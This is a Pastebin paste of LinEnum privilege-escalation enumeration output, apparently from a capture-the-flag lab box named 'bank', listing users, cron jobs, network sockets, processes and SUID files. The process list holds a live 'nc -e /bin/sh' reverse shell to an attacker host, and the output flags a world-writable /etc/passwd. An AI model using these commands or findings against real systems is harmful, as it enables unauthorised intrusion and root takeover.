Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [00;31m#########################################################[00m
- [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
- [00;31m#########################################################[00m
- [00;33m# www.rebootuser.com[00m
- [00;33m# [00m
- Debug Info
- thorough tests = enabled
- [00;33mScan started at:
- Tue Sep 19 03:15:16 EEST 2017
- [00m
- [00;33m### SYSTEM ##############################################[00m
- [00;31mKernel information:[00m
- Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 i686 i686 GNU/Linux
- [00;31mKernel information (continued):[00m
- Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017
- [00;31mSpecific release information:[00m
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=14.04
- DISTRIB_CODENAME=trusty
- DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
- NAME="Ubuntu"
- VERSION="14.04.5 LTS, Trusty Tahr"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 14.04.5 LTS"
- VERSION_ID="14.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- [00;31mHostname:[00m
- bank
- [00;33m### USER/GROUP ##########################################[00m
- [00;31mCurrent user/group info:[00m
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- [00;31mUsers that have previously logged onto the system:[00m
- Username Port From Latest
- root tty1 Fri Jun 16 07:44:56 +0300 2017
- chris pts/0 192.168.147.1 Sun May 28 22:16:12 +0300 2017
- [00;31mWho else is logged on:[00m
- 03:15:16 up 16:14, 0 users, load average: 0.00, 0.01, 0.00
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- [00;31mGroup memberships:[00m
- uid=0(root) gid=0(root) groups=0(root)
- uid=1(daemon) gid=1(daemon) groups=1(daemon)
- uid=2(bin) gid=2(bin) groups=2(bin)
- uid=3(sys) gid=3(sys) groups=3(sys)
- uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
- uid=5(games) gid=60(games) groups=60(games)
- uid=6(man) gid=12(man) groups=12(man)
- uid=7(lp) gid=7(lp) groups=7(lp)
- uid=8(mail) gid=8(mail) groups=8(mail)
- uid=9(news) gid=9(news) groups=9(news)
- uid=10(uucp) gid=10(uucp) groups=10(uucp)
- uid=13(proxy) gid=13(proxy) groups=13(proxy)
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- uid=34(backup) gid=34(backup) groups=34(backup)
- uid=38(list) gid=38(list) groups=38(list)
- uid=39(irc) gid=39(irc) groups=39(irc)
- uid=41(gnats) gid=41(gnats) groups=41(gnats)
- uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
- uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
- uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)
- uid=102(messagebus) gid=106(messagebus) groups=106(messagebus)
- uid=103(landscape) gid=109(landscape) groups=109(landscape)
- uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
- uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
- uid=105(bind) gid=112(bind) groups=112(bind)
- uid=106(mysql) gid=114(mysql) groups=114(mysql)
- [00;31mSample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):[00m
- root:x:0:0:root:/root:/bin/bash
- chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
- [00;31mSuper user account(s):[00m
- root
- [00;31mAre permissions on /home directories lax:[00m
- total 12K
- drwxr-xr-x 3 root root 4.0K May 28 22:13 .
- drwxr-xr-x 21 root root 4.0K Jun 15 08:12 ..
- drwxr-xr-x 3 chris chris 4.0K Jun 14 18:21 chris
- [00;31mFiles not owned by user but writable by group:[00m
- -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access
- [00;31mWorld-readable files within /home:[00m
- -rw-r--r-- 1 chris chris 675 May 28 22:13 /home/chris/.profile
- -rw-r--r-- 1 chris chris 3637 May 28 22:13 /home/chris/.bashrc
- -rw-rw-r-- 1 chris chris 33 May 29 14:52 /home/chris/user.txt
- -rw-r--r-- 1 chris chris 220 May 28 22:13 /home/chris/.bash_logout
- [00;31mHome directory contents:[00m
- total 16K
- drwxr-xr-x 4 root root 4.0K May 28 22:48 .
- drwxr-xr-x 14 root root 4.0K May 29 18:41 ..
- drwxr-xr-x 6 www-data www-data 4.0K Jun 15 09:21 bank
- drwxr-xr-x 2 root root 4.0K Jun 14 18:02 html
- [00;31mRoot is allowed to login via SSH:[00m
- PermitRootLogin yes
- [00;33m### ENVIRONMENTAL #######################################[00m
- [00;31m Environment information:[00m
- APACHE_PID_FILE=/var/run/apache2/apache2.pid
- APACHE_RUN_USER=www-data
- APACHE_LOG_DIR=/var/log/apache2
- PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- PWD=/var/www/bank/uploads
- APACHE_RUN_GROUP=www-data
- LANG=C
- SHLVL=1
- APACHE_LOCK_DIR=/var/lock/apache2
- APACHE_RUN_DIR=/var/run/apache2
- _=/usr/bin/env
- [00;31mPath information:[00m
- /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
- [00;31mAvailable shells:[00m
- # /etc/shells: valid login shells
- /bin/sh
- /bin/dash
- /bin/bash
- /bin/rbash
- /usr/bin/tmux
- /usr/bin/screen
- [00;31mCurrent umask value:[00m
- 0022
- u=rwx,g=rx,o=rx
- [00;31mumask value as specified in /etc/login.defs:[00m
- UMASK 022
- [00;31mPassword and storage information:[00m
- PASS_MAX_DAYS 99999
- PASS_MIN_DAYS 0
- PASS_WARN_AGE 7
- ENCRYPT_METHOD SHA512
- [00;33m### JOBS/TASKS ##########################################[00m
- [00;31mCron jobs:[00m
- -rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab
- /etc/cron.d:
- total 16
- drwxr-xr-x 2 root root 4096 May 28 22:40 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- -rw-r--r-- 1 root root 510 Feb 9 2017 php5
- /etc/cron.daily:
- total 76
- drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- -rwxr-xr-x 1 root root 625 May 9 19:15 apache2
- -rwxr-xr-x 1 root root 376 Apr 4 2014 apport
- -rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
- -rwxr-xr-x 1 root root 314 Feb 18 2014 aptitude
- -rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
- -rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
- -rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
- -rwxr-xr-x 1 root root 1261 Sep 23 2014 man-db
- -rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
- -rwxr-xr-x 1 root root 249 Feb 17 2014 passwd
- -rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
- -rwxr-xr-x 1 root root 214 Oct 7 2014 update-notifier-common
- -rwxr-xr-x 1 root root 328 Jul 18 2014 upstart
- /etc/cron.hourly:
- total 12
- drwxr-xr-x 2 root root 4096 May 28 21:51 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- /etc/cron.monthly:
- total 12
- drwxr-xr-x 2 root root 4096 May 28 21:51 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- /etc/cron.weekly:
- total 28
- drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
- -rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
- -rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
- -rwxr-xr-x 1 root root 771 Sep 23 2014 man-db
- -rwxr-xr-x 1 root root 211 Oct 7 2014 update-notifier-common
- [00;31mCrontab contents:[00m
- # /etc/crontab: system-wide crontab
- # Unlike any other crontab you don't have to run the `crontab'
- # command to install the new version when you edit this file
- # and files in /etc/cron.d. These files also have username fields,
- # that none of the other crontabs do.
- SHELL=/bin/sh
- PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
- # m h dom mon dow user command
- 17 * * * * root cd / && run-parts --report /etc/cron.hourly
- 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
- 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
- 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
- #
- [00;33m### NETWORKING ##########################################[00m
- [00;31mNetwork & IP info:[00m
- eth0 Link encap:Ethernet HWaddr 00:50:56:aa:b1:0c
- inet addr:10.10.10.29 Bcast:10.10.10.255 Mask:255.255.255.0
- inet6 addr: fe80::250:56ff:feaa:b10c/64 Scope:Link
- inet6 addr: dead:beef::250:56ff:feaa:b10c/64 Scope:Global
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:6318125 errors:4580 dropped:8585 overruns:0 frame:0
- TX packets:6275341 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:1581182731 (1.5 GB) TX bytes:1177779161 (1.1 GB)
- Interrupt:19 Base address:0x2000
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:65536 Metric:1
- RX packets:3373 errors:0 dropped:0 overruns:0 frame:0
- TX packets:3373 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1
- RX bytes:347776 (347.7 KB) TX bytes:347776 (347.7 KB)
- [00;31mARP history:[00m
- ? (10.10.10.2) at 00:50:56:aa:e6:4b [ether] on eth0
- [00;31mNameserver(s):[00m
- nameserver 10.10.10.29
- nameserver 192.168.1.7
- [00;31mDefault route:[00m
- default 10.10.10.2 0.0.0.0 UG 0 0 0 eth0
- [00;31mListening TCP:[00m
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 10.10.10.29:53 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
- tcp 0 0 10.10.10.29:41626 10.10.14.3:6969 ESTABLISHED 2203/sh
- tcp6 0 0 :::80 :::* LISTEN -
- tcp6 0 0 :::53 :::* LISTEN -
- tcp6 0 0 :::22 :::* LISTEN -
- tcp6 0 0 ::1:953 :::* LISTEN -
- tcp6 0 0 10.10.10.29:80 10.10.14.3:57208 TIME_WAIT -
- tcp6 0 0 10.10.10.29:80 10.10.14.3:57204 TIME_WAIT -
- tcp6 0 0 10.10.10.29:80 10.10.14.3:57168 ESTABLISHED -
- [00;31mListening UDP:[00m
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- udp 0 0 10.10.10.29:53 0.0.0.0:* -
- udp 0 0 127.0.0.1:53 0.0.0.0:* -
- udp6 0 0 :::53 :::* -
- [00;33m### SERVICES #############################################[00m
- [00;31mRunning processes:[00m
- USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
- root 1 0.0 0.2 4312 2508 ? Ss Sep18 0:01 /sbin/init
- root 2 0.0 0.0 0 0 ? S Sep18 0:00 [kthreadd]
- root 3 0.0 0.0 0 0 ? S Sep18 0:50 [ksoftirqd/0]
- root 5 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:0H]
- root 7 0.0 0.0 0 0 ? S Sep18 0:02 [rcu_sched]
- root 8 0.0 0.0 0 0 ? S Sep18 0:00 [rcu_bh]
- root 9 0.0 0.0 0 0 ? S Sep18 0:00 [migration/0]
- root 10 0.0 0.0 0 0 ? S Sep18 0:00 [watchdog/0]
- root 11 0.0 0.0 0 0 ? S Sep18 0:00 [kdevtmpfs]
- root 12 0.0 0.0 0 0 ? S< Sep18 0:00 [netns]
- root 13 0.0 0.0 0 0 ? S< Sep18 0:00 [perf]
- root 14 0.0 0.0 0 0 ? S Sep18 0:00 [khungtaskd]
- root 15 0.0 0.0 0 0 ? S< Sep18 0:00 [writeback]
- root 16 0.0 0.0 0 0 ? SN Sep18 0:00 [ksmd]
- root 17 0.0 0.0 0 0 ? SN Sep18 0:00 [khugepaged]
- root 18 0.0 0.0 0 0 ? S< Sep18 0:00 [crypto]
- root 19 0.0 0.0 0 0 ? S< Sep18 0:00 [kintegrityd]
- root 20 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 21 0.0 0.0 0 0 ? S< Sep18 0:00 [kblockd]
- root 22 0.0 0.0 0 0 ? S< Sep18 0:00 [ata_sff]
- root 23 0.0 0.0 0 0 ? S< Sep18 0:00 [md]
- root 24 0.0 0.0 0 0 ? S< Sep18 0:00 [devfreq_wq]
- root 26 0.0 0.0 0 0 ? S Sep18 0:06 [kworker/0:1]
- root 28 0.0 0.0 0 0 ? S Sep18 0:01 [kswapd0]
- root 29 0.0 0.0 0 0 ? S< Sep18 0:00 [vmstat]
- root 30 0.0 0.0 0 0 ? S Sep18 0:00 [fsnotify_mark]
- root 31 0.0 0.0 0 0 ? S Sep18 0:00 [ecryptfs-kthrea]
- root 47 0.0 0.0 0 0 ? S< Sep18 0:00 [kthrotld]
- root 48 0.0 0.0 0 0 ? S< Sep18 0:00 [acpi_thermal_pm]
- root 49 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 50 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 52 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 53 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 54 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 55 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 56 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 57 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 58 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_0]
- root 59 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_0]
- root 60 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_1]
- root 61 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_1]
- root 64 0.0 0.0 0 0 ? S< Sep18 0:00 [ipv6_addrconf]
- root 77 0.0 0.0 0 0 ? S< Sep18 0:00 [deferwq]
- root 78 0.0 0.0 0 0 ? S< Sep18 0:00 [charger_manager]
- root 80 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 81 0.0 0.0 0 0 ? S Sep18 0:00 [kworker/0:2]
- root 136 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:1H]
- root 137 0.0 0.0 0 0 ? S< Sep18 0:00 [kpsmoused]
- root 138 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt_poll_0]
- root 139 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt/0]
- root 141 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_2]
- root 142 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_2]
- root 143 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
- root 169 0.0 0.0 0 0 ? S Sep18 0:00 [jbd2/sda1-8]
- root 170 0.0 0.0 0 0 ? S< Sep18 0:00 [ext4-rsv-conver]
- root 299 0.0 0.1 3160 1312 ? S Sep18 0:00 upstart-udev-bridge --daemon
- root 303 0.0 0.1 12356 1948 ? Ss Sep18 0:00 /lib/systemd/systemd-udevd --daemon
- message+ 366 0.0 0.1 4268 1144 ? Ss Sep18 0:00 dbus-daemon --system --fork
- root 393 0.0 0.1 3996 1664 ? Ss Sep18 0:00 /lib/systemd/systemd-logind
- syslog 407 0.0 0.1 30492 1780 ? Ssl Sep18 0:00 rsyslogd
- root 436 0.0 0.1 3164 1044 ? S Sep18 0:00 upstart-file-bridge --daemon
- root 479 0.0 0.0 0 0 ? S< Sep18 0:00 [ttm_swap]
- root 649 0.0 0.0 2888 4 ? S Sep18 0:00 upstart-socket-bridge --daemon
- root 781 0.0 0.1 4660 1728 tty4 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty4
- root 784 0.0 0.1 4660 1688 tty5 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty5
- root 789 0.0 0.1 4660 1724 tty2 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty2
- root 790 0.0 0.1 4660 1732 tty3 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty3
- root 793 0.0 0.1 4660 1592 tty6 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty6
- root 826 0.0 0.2 7828 2760 ? Ss Sep18 0:00 /usr/sbin/sshd -D
- daemon 827 0.0 0.0 2656 0 ? Ss Sep18 0:00 atd
- root 828 0.0 0.1 3068 1904 ? Ss Sep18 0:00 cron
- root 875 0.0 0.1 2212 1356 ? Ss Sep18 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
- mysql 909 0.0 3.4 327756 35612 ? Ssl Sep18 0:23 /usr/sbin/mysqld
- bind 936 0.0 1.3 46152 13416 ? Ssl Sep18 0:01 /usr/sbin/named -u bind
- root 1025 0.0 1.6 103516 16616 ? Ss Sep18 0:03 /usr/sbin/apache2 -k start
- www-data 1028 0.0 0.3 21540 3544 ? S Sep18 0:01 /usr/sbin/apache2 -k start
- root 1074 0.0 0.1 4660 1824 tty1 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty1
- root 1197 0.0 0.0 0 0 ? S Sep18 0:00 [kauditd]
- www-data 2047 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2061 0.0 0.9 103604 9428 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2065 0.0 1.1 103720 11348 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2111 0.0 1.0 103736 10768 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2116 0.0 0.6 103596 6864 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2119 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2124 0.0 0.9 103596 9568 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2132 0.0 0.9 103588 9816 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2164 0.0 0.9 103588 9812 ? S 02:17 0:00 /usr/sbin/apache2 -k start
- www-data 2177 0.0 1.0 103588 10360 ? S 02:19 0:00 /usr/sbin/apache2 -k start
- root 2198 0.0 0.0 0 0 ? S 02:54 0:00 [kworker/u16:0]
- root 2201 0.0 0.0 0 0 ? S 03:02 0:00 [kworker/u16:2]
- www-data 2202 0.0 0.0 2284 628 ? S 03:06 0:00 sh -c nc -e /bin/sh 10.10.14.3 6969
- www-data 2203 0.0 0.1 2284 1368 ? S 03:06 0:00 sh
- www-data 3430 0.3 0.2 3512 2840 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
- www-data 3762 0.0 0.1 3504 1956 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
- www-data 3763 0.0 0.1 3156 1968 ? R 03:15 0:00 ps aux
- [00;31mProcess binaries & associated permissions (from above list):[00m
- -rwxr-xr-x 1 root root 986672 May 16 15:54 /bin/bash
- -rwxr-xr-x 1 root root 259552 Feb 7 2017 /lib/systemd/systemd-logind
- -rwxr-xr-x 1 root root 235064 Feb 7 2017 /lib/systemd/systemd-udevd
- -rwxr-xr-x 2 root root 26756 Nov 24 2016 /sbin/getty
- -rwxr-xr-x 1 root root 252080 Jul 18 2014 /sbin/init
- -rwxr-xr-x 1 root root 597796 May 9 19:16 /usr/sbin/apache2
- -rwxr-xr-x 1 root root 10724544 Apr 25 19:57 /usr/sbin/mysqld
- -rwxr-xr-x 1 root root 573516 Apr 13 11:12 /usr/sbin/named
- -rwxr-xr-x 1 root root 834648 Aug 11 2016 /usr/sbin/sshd
- [00;31m/etc/init.d/ binary permissions:[00m
- total 200
- drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
- drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
- -rw-r--r-- 1 root root 0 Aug 3 2016 .legacy-bootordering
- -rw-r--r-- 1 root root 2427 Mar 13 2014 README
- -rwxr-xr-x 1 root root 2243 Apr 3 2014 acpid
- -rwxr-xr-x 1 root root 9974 Jan 7 2014 apache2
- -rwxr-xr-x 1 root root 4125 Mar 16 2017 apparmor
- -rwxr-xr-x 1 root root 2801 May 18 2016 apport
- -rwxrwxr-x 1 root root 1071 Sep 8 2013 atd
- -rwxr-xr-x 1 root root 3451 Apr 13 11:07 bind9
- -rwxr-xr-x 1 root root 1919 Jan 18 2011 console-setup
- lrwxrwxrwx 1 root root 21 May 28 21:51 cron -> /lib/init/upstart-job
- -rwxr-xr-x 1 root root 2813 Nov 25 2014 dbus
- -rwxr-xr-x 1 root root 1217 Mar 7 2013 dns-clean
- lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
- -rwxr-xr-x 1 root root 1105 May 13 2015 grub-common
- -rwxr-xr-x 1 root root 1329 Mar 13 2014 halt
- -rwxr-xr-x 1 root root 1864 Nov 12 2012 irqbalance
- -rwxr-xr-x 1 root root 1293 Mar 13 2014 killprocs
- -rwxr-xr-x 1 root root 1990 Jan 22 2013 kmod
- -rwxr-xr-x 1 root root 5491 Feb 19 2014 mysql
- -rwxr-xr-x 1 root root 4479 Mar 20 2014 networking
- -rwxr-xr-x 1 root root 1581 Feb 17 2016 ondemand
- -rwxr-xr-x 1 root root 561 Apr 21 2015 pppd-dns
- -rwxr-xr-x 1 root root 1192 May 27 2013 procps
- -rwxr-xr-x 1 root root 6120 Mar 13 2014 rc
- -rwxr-xr-x 1 root root 782 Mar 13 2014 rc.local
- -rwxr-xr-x 1 root root 117 Mar 13 2014 rcS
- -rwxr-xr-x 1 root root 639 Mar 13 2014 reboot
- -rwxr-xr-x 1 root root 2918 Jun 13 2014 resolvconf
- -rwxr-xr-x 1 root root 4395 Jan 20 2016 rsync
- -rwxr-xr-x 1 root root 2913 Dec 4 2013 rsyslog
- -rwxr-xr-x 1 root root 1226 Jul 22 2013 screen-cleanup
- -rwxr-xr-x 1 root root 3920 Mar 13 2014 sendsigs
- -rwxr-xr-x 1 root root 590 Mar 13 2014 single
- -rw-r--r-- 1 root root 4290 Mar 13 2014 skeleton
- -rwxr-xr-x 1 root root 4077 May 2 2014 ssh
- -rwxr-xr-x 1 root root 731 Feb 5 2014 sudo
- -rwxr-xr-x 1 root root 6173 Apr 14 2014 udev
- -rwxr-xr-x 1 root root 2721 Mar 13 2014 umountfs
- -rwxr-xr-x 1 root root 2260 Mar 13 2014 umountnfs.sh
- -rwxr-xr-x 1 root root 1872 Mar 13 2014 umountroot
- -rwxr-xr-x 1 root root 1361 Dec 6 2013 unattended-upgrades
- -rwxr-xr-x 1 root root 3111 Mar 13 2014 urandom
- [00;33m### SOFTWARE #############################################[00m
- [00;31mSudo version:[00m
- Sudo version 1.8.9p5
- [00;31mMYSQL version:[00m
- mysql Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3
- [00;31mApache version:[00m
- Server version: Apache/2.4.7 (Ubuntu)
- Server built: May 9 2017 16:13:38
- [00;31mApache user configuration:[00m
- APACHE_RUN_USER=www-data
- APACHE_RUN_GROUP=www-data
- [00;31mInstalled Apache modules:[00m
- Loaded Modules:
- core_module (static)
- so_module (static)
- watchdog_module (static)
- http_module (static)
- log_config_module (static)
- logio_module (static)
- version_module (static)
- unixd_module (static)
- access_compat_module (shared)
- alias_module (shared)
- auth_basic_module (shared)
- authn_core_module (shared)
- authn_file_module (shared)
- authz_core_module (shared)
- authz_host_module (shared)
- authz_user_module (shared)
- autoindex_module (shared)
- deflate_module (shared)
- dir_module (shared)
- env_module (shared)
- fcgid_module (shared)
- filter_module (shared)
- include_module (shared)
- mime_module (shared)
- mpm_prefork_module (shared)
- negotiation_module (shared)
- php5_module (shared)
- rewrite_module (shared)
- setenvif_module (shared)
- status_module (shared)
- suexec_module (shared)
- [00;33m### INTERESTING FILES ####################################[00m
- [00;31mUseful file locations:[00m
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/nmap
- /usr/bin/gcc
- [00;31mInstalled compilers:[00m
- ii g++ 4:4.8.2-1ubuntu6 i386 GNU C++ compiler
- ii g++-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C++ compiler
- ii gcc 4:4.8.2-1ubuntu6 i386 GNU C compiler
- ii gcc-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C compiler
- [00;31mCan we read/write sensitive files:[00m
- -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
- -rw-r--r-- 1 root root 707 May 28 22:40 /etc/group
- -rw-r--r-- 1 root root 665 Feb 20 2014 /etc/profile
- -rw-r----- 1 root shadow 895 Jun 14 18:16 /etc/shadow
- [00;31mSUID files:[00m
- -rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
- -rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
- -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
- -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
- -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
- -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
- -rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
- -rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
- -rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
- -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
- -rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
- -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
- -rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
- -rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
- -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
- -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
- -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
- -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
- -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
- -rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
- -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
- -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
- -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
- [00;31mGUID files:[00m
- -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
- -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-lock
- -rwxr-sr-x 1 root utmp 406700 Nov 7 2013 /usr/bin/screen
- -rwxr-sr-x 1 root mlocate 34452 Jun 20 2013 /usr/bin/mlocate
- -rwxr-sr-x 1 root tty 9748 Jun 4 2013 /usr/bin/bsd-write
- -rwxr-sr-x 1 root ssh 329144 Aug 11 2016 /usr/bin/ssh-agent
- -rwxr-sr-x 1 root shadow 53516 May 17 02:38 /usr/bin/chage
- -rwxr-sr-x 1 root tty 18056 Nov 24 2016 /usr/bin/wall
- -rwxr-sr-x 1 root shadow 18208 May 17 02:38 /usr/bin/expiry
